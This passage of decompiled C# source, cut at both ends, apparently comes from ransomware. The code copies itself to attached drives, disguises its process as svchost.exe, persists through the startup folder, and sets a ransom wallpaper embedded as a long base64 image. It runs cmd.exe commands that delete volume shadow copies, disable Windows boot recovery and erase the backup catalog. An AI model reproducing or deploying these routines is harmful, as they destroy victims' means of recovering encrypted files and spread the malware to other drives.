+ spreadName)) { try { File.Copy(Assembly.GetExecutingAssembly().Location, driveInfo.ToString() + spreadName); } catch { } } } } // Token: 0x06000018 RID: 24 RVA: 0x00002DC4 File Offset: 0x00000FC4 private static void runCommand(string commands) { Process process = new Process(); process.StartInfo = new ProcessStartInfo { FileName = "cmd.exe", Arguments = "/C " + commands, WindowStyle = 1 }; process.Start(); process.WaitForExit(); } // Token: 0x06000019 RID: 25 RVA: 0x00002E14 File Offset: 0x00001014 private static void deleteShadowCopies() { Program.runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete"); } // Token: 0x0600001A RID: 26 RVA: 0x00002E20 File Offset: 0x00001020 private static void disableRecoveryMode() { Program.runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"); } // Token: 0x0600001B RID: 27 RVA: 0x00002E2C File Offset: 0x0000102C private static void deleteBackupCatalog() { Program.runCommand("wbadmin delete catalog -quiet"); } // Token: 0x0600001C RID: 28 RVA: 0x00002E38 File Offset: 0x00001038 public static void SetWallpaper(string base64) { if (base64 != "") { try { string text = Path.GetTempPath() + Program.RandomString(9) + ".jpg"; File.WriteAllBytes(text, Convert.FromBase64String(base64)); Program.SystemParametersInfo(20U, 0U, text, 3U); } catch { } } } // Token: 0x04000001 RID: 1 private static string userName = Environment.UserName; // Token: 0x04000002 RID: 2 private static string userDir = "C:\\Users\\"; // Token: 0x04000003 RID: 3 public static string appMutexRun = "7z459ajrk722yn8c5j4fg"; // Token: 0x04000004 RID: 4 public static bool encryptionAesRsa = false; // Token: 0x04000005 RID: 5 public static string encryptedFileExtension = ""; // Token: 0x04000006 RID: 6 private static bool checkSpread = true; // Token: 0x04000007 RID: 7 private static string spreadName = "EZZZZ.exe"; // Token: 0x04000008 RID: 8 private static bool checkCopyRoaming = true; // Token: 0x04000009 RID: 9 private static string processName = "svchost.exe"; // Token: 0x0400000A RID: 10 public static string appMutexRun2 = "2X28tfRmWaPyPQgvoHV"; // Token: 0x0400000B RID: 11 private static bool checkStartupFolder = true; // Token: 0x0400000C RID: 12 private static bool checkSleep = false; // Token: 0x0400000D RID: 13 private static int sleepTextbox = 10; // Token: 0x0400000E RID: 14 private static string base64Image = "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